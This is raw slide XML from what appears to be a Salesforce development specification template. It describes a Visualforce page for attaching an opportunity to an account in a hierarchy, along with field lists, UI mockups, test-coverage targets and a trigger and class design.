          <a:xfrm>
            <a:off x="1475656" y="2492896"/>
            <a:ext cx="1547813" cy="144463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</a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User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1475656" y="2636912"/>
            <a:ext cx="1547813" cy="719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71450" indent="-171450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  <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>LastName</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" eaLnBrk="0" hangingPunct="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  <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Email</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Elbow Connector 22"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="1"/>
            <a:endCxn id="22" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="3023470" y="2996482"/>
            <a:ext cx="1404515" cy="447"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000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0051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3502113"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5360640" y="2139776"/>
          <a:ext cx="1371600" cy="1097280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="646113"/>
                <a:gridCol w="725487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Effort</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB" sz="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0,75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</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB" sz="7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0.25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4201507"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2336305" y="2132856"/>
          <a:ext cx="2455888" cy="1188720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1822691"/>
                <a:gridCol w="633197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Deliverables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Visualforce Page VFP87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Visualforce Controller VFC87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Deliverables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, Effort &amp; Fields&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5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2539621"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1835696" y="3717032"/>
          <a:ext cx="5486400" cy="1517904"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1084263"/>
                <a:gridCol w="1416050"/>
                <a:gridCol w="1716087"/>
                <a:gridCol w="1270000"/>
              </a:tblGrid>
              <a:tr h="25603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Fields used for this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Field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Parent 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Reference (Account)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fr-FR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Account</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-GB" sz="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N W3"/>
                        <a:cs typeface="ヒラギノ角ゴ ProN W3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OwnerId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Reference (User)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GB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Last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/>
                          <a:cs typeface="ヒラギノ角ゴ ProN W3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53932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Requirements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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09588" y="908720"/>
            <a:ext cx="8177212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>
            <a:lvl1pPr marL="354013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90563" indent="-28575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906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•"/>
              <a:defRPr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5478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–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050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4622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6pPr>
            <a:lvl7pPr marL="29194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7pPr>
            <a:lvl8pPr marL="33766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8pPr>
            <a:lvl9pPr marL="38338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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>From an omportunity, a button will call VF87 : the user will be able to select one and only one account in the accounts of the account hierarchy (from top to bottom)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>For each account, the Account Name, Owner Last name and Owner email appears in the table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>VF87 should take into account the visibility on records</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>On cancel, the user returns on previous page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>On save, the user goes on the HOME tab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>If an error occurs, it is displayed properly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Test coverage :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>the test coverage should be above 95%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>100% would be appreciated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>If under 95%, reasons must be documented</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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815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99592" y="1844824"/>
            <a:ext cx="7488832" cy="3312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UI - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Screenshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a: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2929042"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1187624" y="2627809"/>
          <a:ext cx="6792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/>
                <a:gridCol w="1698104"/>
                <a:gridCol w="1698104"/>
                <a:gridCol w="169810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Account</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 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Lastname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Email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EDF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Idf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 Boulogne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jsmith@example.com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787352" y="307563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7352" y="3438669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87352" y="379571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X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NB1 : colors are not important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35896" y="4374207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SAVE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84828" y="4365104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CANCEL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26350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Please Choose an account you want the opportunity to be attached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956944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899592" y="1844824"/>
            <a:ext cx="7488832" cy="33123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1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UI – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Detail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a: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8109883"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1187624" y="2627809"/>
          <a:ext cx="6792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/>
                <a:gridCol w="1698104"/>
                <a:gridCol w="1698104"/>
                <a:gridCol w="169810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Account</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 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Lastname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Owner Email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EDF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Idf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jsmith@example.com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EDF Boulogne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jsmith@example.com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787352" y="307563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7352" y="3438669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87352" y="3795713"/>
            <a:ext cx="288032" cy="216024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X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0119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NB1 : colors are not important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35896" y="4374207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SAVE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84828" y="4365104"/>
            <a:ext cx="1080120" cy="3600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CANCEL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26350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Please Choose an account you want the opportunity to be attached</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3653898" y="4734247"/>
            <a:ext cx="522058" cy="56696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555776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Attach the opportunity to this Account and go back on the Home tab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04420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Do nothing and go back on the opportunity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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="2"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5424888" y="4725144"/>
            <a:ext cx="577654" cy="576064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22" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1400098" y="4011600"/>
            <a:ext cx="387254" cy="128960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01976" y="5301208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Checkbox but only one can be selected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7164288" y="1484784"/>
            <a:ext cx="265636" cy="180687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329836" y="836712"/>
            <a:ext cx="2196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  <a:latin typeface="Arial" pitchFamily="27" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W3" pitchFamily="27" charset="-128"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W3" pitchFamily="27" charset="-128"/>
                <a:sym typeface="Arial" pitchFamily="27" charset="0"/>
              </a:rPr>
              <a:t>Limit to 1000 account only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27" charset="0"/>
              <a:ea typeface="ヒラギノ角ゴ ProN W3" pitchFamily="27" charset="-128"/>
              <a:cs typeface="ヒラギノ角ゴ ProN W3" pitchFamily="27" charset="-128"/>
              <a:sym typeface="Arial" pitchFamily="27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887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err="1" smtClean="0"/>
              <a:t>Context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean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 bwMode="auto">
          <a:xfrm>
            <a:off x="509588" y="1447800"/>
            <a:ext cx="8177212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63500" rIns="139489" bIns="63500" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="354013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90563" indent="-28575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906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•"/>
              <a:defRPr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5478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–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005013" indent="-228600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4622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6pPr>
            <a:lvl7pPr marL="29194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7pPr>
            <a:lvl8pPr marL="33766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8pPr>
            <a:lvl9pPr marL="3833813" indent="-228600" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1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rgbClr val="6B6B6B"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial" pitchFamily="27" charset="0"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="6B6B6B"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs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The page is accessed from : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A button on the Opportunity detail page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parameters provided to the page are :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>retURL : where to go when the user cancel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>saveURL : where to go when the user saves</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Id : id of the current Opportunity</a:t>
            </a:r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971839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Custom Labels&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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6152775"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179388" y="1916832"/>
          <a:ext cx="8724900" cy="3344862"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s158726" name="Worksheet" r:id="rId3" imgW="6362603" imgH="2842206" progId="Excel.Shee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711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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" smtClean="0"/>
              <a:t>&lt;PAD Spec – Document structure 1/4 – Common Slides&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="20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69988" y="762000"/>
            <a:ext cx="6907212" cy="5867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sz="200" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="200" b="1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Cover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Name of the project, name of the customer, version of the build, date of the document, title of the document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1550988" lvl="3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500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Agenda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Content table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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Context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A quick summary of the project and a short description : conceptual and contextual.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500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Planning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An overview of the project planning showing a focus on the build phase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1550988" lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800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Development Summary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A list of all developments, with : Sobject, When, Condition, Action</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1550988" lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800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ERD – Entity Relationship Diagram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A reminder of the global Data Model of the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1550988" lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
              <a:t>Existing Code Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1550988" lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" smtClean="0"/>
              <a:t>A schema describing all objects where code is triggered, and corresponding fields and actions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063625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25625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2587625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4111625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4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4873625"/>
            <a:ext cx="917575" cy="68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5635625"/>
            <a:ext cx="917575" cy="68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50" name="Picture 9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3349625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01976" y="-6365"/>
            <a:ext cx="8229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>
            <a:lvl1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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5pPr marL="39688" indent="-39688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charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="4968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6pPr>
            <a:lvl7pPr marL="9540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7pPr>
            <a:lvl8pPr marL="14112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8pPr>
            <a:lvl9pPr marL="186848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27" charset="0"/>
                <a:ea typeface="ヒラギノ角ゴ ProN W6" pitchFamily="27" charset="-128"/>
                <a:cs typeface="ヒラギノ角ゴ ProN W6" pitchFamily="27" charset="-128"/>
                <a:sym typeface="Arial" pitchFamily="27" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Unit Tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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256259"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="755650" y="1196975"/>
          <a:ext cx="7566025" cy="4759325"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s159750" name="Worksheet" r:id="rId3" imgW="6791325" imgH="3619500" progId="Excel.Shee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5302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How to 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latest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> PAD version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err="1" smtClean="0"/>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> an email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> « PAD » keyword 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PAD@FSGBU.COM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143000"/>
            <a:ext cx="182403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35175"/>
            <a:ext cx="76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55925"/>
            <a:ext cx="83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95"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="5181600"/>
            <a:ext cx="2819400" cy="15240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9489" tIns="32400" rIns="139489" bIns="3240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800"/>
              <a:t>Update configuration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400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bypass_Apex_triggers__c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="300" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="300" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add the value “AP12”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400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remove opportunity validation Rule «  CORE_Deleting_UCI_Scope »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fr-FR" sz="400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remove fields </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nb_of_Product__c, Nb_of_Service__c, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IE" sz="400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-IE" sz="300" b="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Nb of Product Lines, Nb of Service Lines)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="300" b="1">
              <a:solidFill>
                <a:srgbClr val="333333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800"/>
              <a:t>Create a new trigger on Quote__c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GB" sz="400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>QuoteBeforeDelete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chemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="130000"/>
              <a:buFontTx/>
              <a:buChar char="»"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="1"/>
              <a:t>If User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="500" b="1"/>
              <a:t>not bypassing AP12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" b="1"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="1"/>
              <a:t>Call a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="500" b="1"/>
              <a:t>AP12Quote.PreventFromDeleting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="1"/>
              <a:t>() passing trigger.old.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="500" b="1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GB" sz="400">
              <a:solidFill>
                <a:srgbClr val="333333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800"/>
              <a:t>Create a new Class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800"/>
              <a:t>AP12Quote</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800"/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GB" sz="400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a method PreventFromDeleting(), bulk compliant</a:t>
            </a:r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GB" sz="400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create a bulk compliant testmethod, checking the full development scope (both triggers and all conditions of the class method, validating all cases in the slide ‘test cases’)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3276600" cy="6096000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" lvl="1" eaLnBrk="1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</a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="538163" lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
              <a:t>Restricted ERD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="719138" lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" smtClean="0"/>
              <a:t>Relationships between all objects used for the development</a:t>
            </a:r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538163" lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
              <a:t>Effort</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="719138" lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" smtClean="0"/>
              <a:t>Detailed resource effort for that development, including Dev, Config, Doc.</a:t>
            </a:r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538163" lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
              <a:t>Deliverables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="719138" lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" smtClean="0"/>
              <a:t>All items that the developer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" smtClean="0"/>
              <a:t>must deliver</a:t>
            </a:r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538163" lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
              <a:t>Objects/Fields used for the development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="719138" lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" smtClean="0"/>
              <a:t>The exact list of all fields (and only the required fields), with the object name, field name, field label, field type</a:t>
            </a:r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719138" lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="538163" lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" smtClean="0"/>
              <a:t>Development Detail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="719138" lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" smtClean="0"/>
              <a:t>Finest description of the dev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" smtClean="0"/>
              <a:t>What to code / update / create, how…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="896938" lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="538163" lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="896938" lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950"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sz="1200" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="200" b="1" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
